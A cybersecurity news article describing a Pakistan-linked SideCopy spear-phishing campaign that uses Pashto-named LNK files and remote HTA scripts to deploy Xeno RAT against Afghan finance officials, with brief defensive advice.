Close Menu
Most Read

Pakistan-linked hackers target Afghan finance using Xeno RAT

Staff WriterBy No Comments3 Mins Read0 Views

Summary Points

  1. The Pakistan-linked SideCopy group is conducting sophisticated spear-phishing campaigns targeting Afghan government officials using Pashto-language lures and weaponized ZIP and LNK files to deploy Xeno RAT and other malware, facilitating data theft and persistence.
  2. The campaign exploits remote HTML Application (HTA) files via mshta.exe to deliver obfuscated JavaScript, establishing Registry-based persistence and enabling remote command execution, keystroke logging, and surveillance.
  3. Additionally, a separate targeted operation leverages weaponized Linux .desktop files to infect Indian military infrastructure, using staged shell payloads and Golang-based implants to compromise defense networks.

Threat, Attack Techniques, and Targets

Cybersecurity researchers have uncovered a campaign by the Pakistan-aligned group SideCopy. This group appears to be targeting Afghanistan’s Ministry of Finance. They use spear-phishing emails to deliver malicious files. These files are ZIP archives containing specially crafted LNK files with Pashto-language filenames. The attackers use Pashto because it is the main language spoken in Afghan government circles.

Once a target opens the LNK file, it uses “mshta.exe” to load a remote HTML Application (HTA). In the background, this HTA runs obfuscated JavaScript code. This code triggers a malware drop. The malware includes Xeno RAT, a remote access tool that allows attackers to control the infected device. The campaign also involves provincial revenue and finance officials, government employees, and other provincial-level officials in Afghanistan.

SideCopy is part of a broader group operating under the umbrella of Transparent Tribe or APT36. This group previously used malware like Xeno RAT, Spark RAT, and CurlBack RAT in other South Asian attacks. They seem to be continuing this pattern of targeting South Asian entities with different malicious tools.

Impact, Security Implications, and Remediation Guidance

The attacks can lead to serious security issues. Once infected, the malware can steal sensitive data, monitor activities, take screenshots, and access device cameras and microphones. The attackers can also establish persistent access. This situation could compromise the Afghan government’s financial operations and other sensitive information.

Organizations need to be aware of these attack methods. It is essential to verify email attachments carefully, especially ZIP files with LNK shortcuts. Security teams should also monitor for unusual activity on devices, such as new scheduled tasks or suspicious registry changes.

Because of the technical complexity, a detailed remediation plan should be obtained from the relevant security vendor or authority. Organizations should apply patches, update antivirus software, and employ intrusion detection systems. If infected, immediate isolation and investigation are crucial to contain the threat.

Stay Ahead with the Latest Tech Trends

Learn how the Internet of Things (IoT) is transforming everyday life.

Discover archived knowledge and digital history on the Internet Archive.

ThreatIntel-V1

Share.
Avatar photo

John Marcelli is a staff writer for the CISO Brief, with a passion for exploring and writing about the ever-evolving world of technology. From emerging trends to in-depth reviews of the latest gadgets, John stays at the forefront of innovation, delivering engaging content that informs and inspires readers. When he's not writing, he enjoys experimenting with new tech tools and diving into the digital landscape.

Related Posts

Comments are closed.